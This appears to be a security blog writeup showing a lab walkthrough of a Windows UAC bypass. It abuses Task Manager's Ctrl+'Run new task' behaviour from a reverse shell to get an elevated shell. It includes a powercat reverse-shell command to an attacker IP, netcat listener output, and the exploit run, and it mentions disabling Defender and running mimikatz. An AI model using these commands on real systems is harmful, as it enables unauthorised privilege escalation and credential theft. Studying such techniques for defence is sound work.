init#

The primary objective of this writeup is to check if an attacker can use this technique to bypass UAC and gain additional privilege ONLY using Command / Powershell window got from a Reverse Shell.

User Account Control (UAC) in Windows is a “feature” (do not know how to attribute it) which can be used to prevent a user from making unwanted changes into the system. When running a application in a privileged permission, Windows asks the user if the action is actually legit. This empowers the user with the option to deny any process which is trying to perform actions as “Administrator”.

As per Microsoft:

User Account Control (UAC) is a Windows security feature designed to protect the operating system from unauthorized changes. When changes to the system require administrator-level permission, UAC notifies the user, giving the opportunity to approve or deny the change. UAC improves the security of Windows devices by limiting the access that malicious code has to execute with administrator privileges. UAC empowers users to make informed decisions about actions that may affect the stability and security of their device.

Even if you login in Windows as Administrator user, permissions are not granted to make system changes. After you confirm the UAC window, the necessary privileges are provided and provided to the user. We can see the difference from the screenshot below:

bc85e1d6694f5812d46a7b3d70338968.png The difference between two window of PowerShell is UAC. We can easily see the permission difference between these two.

Now if an attacker is able to access your system, there is almost no way to change your permission from normal user to Administrator unless you have RDP access. Because as per my knowledge, UAC is User Interface based and there is no way you can do it via a Command Prompt. There are few techniques which can allow an attacker to bypass UAC and get more permission to modify system changes. In this post I would like to share a technique I have just learned.

overview#

Interestingly, there is a “feature” in Task Manager where if you Click on “Run new task” while you are pressed on Ctrl, a Command Prompt will come up with Administrator privilege WITHOUT any UAC request. You can see that both in Window 10 (1703) and Windows 11 (22H2) version

45dbd425e96de38a7c53d34c0c925fe2.png Windows 10

bddb197323f4c2323a678120b2990e39.png And in same thing in Window 11

I really wanted to share the source from where I obtained this information but unfortunately, I forgot. You can find additional information from the Reference 1 if you want.

prerequisite#

As bypassing Microsoft Defender is not the primary concern, I will disable them by running the command before starting anything as most of the command / script is considered malicious in nature and will be blocked.

process#

We will be using two separate reverse shell one is a regular with no additional permission and another will be initiated by the code which will basically run the “exploit”.

Lets download the powercat script and add the following:

powercat -c 192.168.0.17 -p 8888 -e cmd.exe

Here, 192.168.0.17 is my attacking VM. Now if we run the powercat we should get the reverse shell:

$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [192.168.0.17] from (UNKNOWN) [192.168.0.16] 49900
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Users\user1>

C:\Users\user1>whoami
whoami
desktop-t26ftc0\user1

C:\Users\user1>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

As we can see that the privilege we have is normal and does not allow use to perform any administrative functions.

From the reference 1 we lets download the code and build the code using Visual Studio (ConsoleApplication1.exe). The code is originally used to run Notepad and echo some text into the window. Now I would like to change the code to run a reverse shell code which have obtained and compiled from reference 2. The second reverse shell (re.exe) would use port 4444.

After we build the “exploit” code which run the re.exe it will send out another reverseshell to port 4444 and lets open another listener in another window and execute the “exploit” code from the first reverse shell.

C:\Users\user1>cd "C:\Users\user1\source\repos\ConsoleApplication1\x64\Release"
cd "C:\Users\user1\source\repos\ConsoleApplication1\x64\Release"

C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 1AF6-1DD9

 Directory of C:\Users\user1\source\repos\ConsoleApplication1\x64\Release

09/02/2023  12:40 PM    <DIR>          .
09/02/2023  12:40 PM    <DIR>          ..
09/02/2023  12:40 PM            15,872 ConsoleApplication1.exe
09/02/2023  12:40 PM           634,880 ConsoleApplication1.pdb
               2 File(s)        650,752 bytes
               2 Dir(s)   4,807,606,272 bytes free

C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>ConsoleApplication1.exe
ConsoleApplication1.exe
Task Manager window found
High IL cmd.exe window found
The string 'cmd /c C:\users\user1\Desktop\re.exe' has been sent to the High IL cmd.exe!
Current process respawned with UIAccess flag

C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>

We should get another reverse shell as shown below: 9bbf3592972303fd5d901a57d5580e5c.png

As we can see we have elevated out privilege and have additional permission to perform system operation without the user requiring any UAC or anything else. Now we can perform additional operations like running mimikatz to gain additional information and if it is a workstation connected to a Active Directory system, consequences could be severe.

I have also tested this on Windows 11 as well and it works.

disclaimer#

The information provided on this website is for educational and informational purposes only. The website owner and contributors do not condone or encourage any illegal activities, including hacking, cyberattacks, or unauthorized access to computer systems or networks.

All information and tools provided on this website are to be used at your own risk. We do not take any responsibility for how you choose to use the information or tools provided here. Users are strongly encouraged to conduct their own research and follow ethical guidelines and legal regulations when using the information and tools presented on this website.

reference#